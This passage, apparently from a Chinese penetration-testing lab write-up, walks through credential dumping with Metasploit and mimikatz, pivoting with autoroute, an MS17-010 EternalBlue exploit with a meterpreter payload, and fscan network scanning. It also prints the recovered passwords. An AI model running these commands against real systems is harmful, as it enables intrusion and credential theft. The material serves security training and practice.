从外网打点到内网横向渗透——多层网络域渗透项目总结( 二 )


文章插图
 
抓一下密码:
run windows/gather/credentials/windows_autologinhashdump

从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 

从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
拿到 Administrator 的密码 Admin12345 , 同时查询域信息: .NET view /domain , 发现该机器并不在域内.
从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
查询网络信息发现是双网卡, 利用 fscan 扫描一下网段: fscan64.exe -h 10.10.20.0/24 > result.txt , 发现网段内存在新的机器 10.10.20.7 , 445 端口是开放的, 疑似存在 MS17-010 漏洞.
从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 

从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 

从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
添加路由, 扫描一下 MS17-010 .
run get_local_subnetsrun autoroute -s 10.10.20.0/24run autoroute -psearch ms17-010use 3set rhost 10.10.20.7run
从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 

从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
发现的确存在 MS17-010 , 利用
exploit/windows/smb/ms17_010_eternalblue 进行攻击, 成功拿下该机器.
search ms17-010use 0set payload windows/x64/meterpreter/bind_tcpset lport 11111run
从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
先查看一下权限, 发现直接就是 system 权限, 也不需要进行提权的操作, 用 mimikatz 抓一下密码, 发现该主机在域环境 redteam.red 内, 并且拿到一组域账户的用户名和密码: saul:[email protected]#45 .
load mimikatzcreds_all
从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
用其他的方式继续抓一下密码, 成功拿到一组本地用户的用户名及密码: john:[email protected]#45 .
hashdumprun windows/gather/smart_hashdumprun windows/gather/credentials/windows_autologin
从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
域内服务器 Mssql查看网段发现新网段, 继续添加路由.
从外网打点到内网横向渗透——多层网络域渗透项目总结

文章插图
 
上传一个 fscan , 扫描一下网段, 发现存在一台 Windows Server 2008 R2 机器: 10.10.10.18 , 开放了 1433 端口, 并且获得一组弱口令: sa:sa .


推荐阅读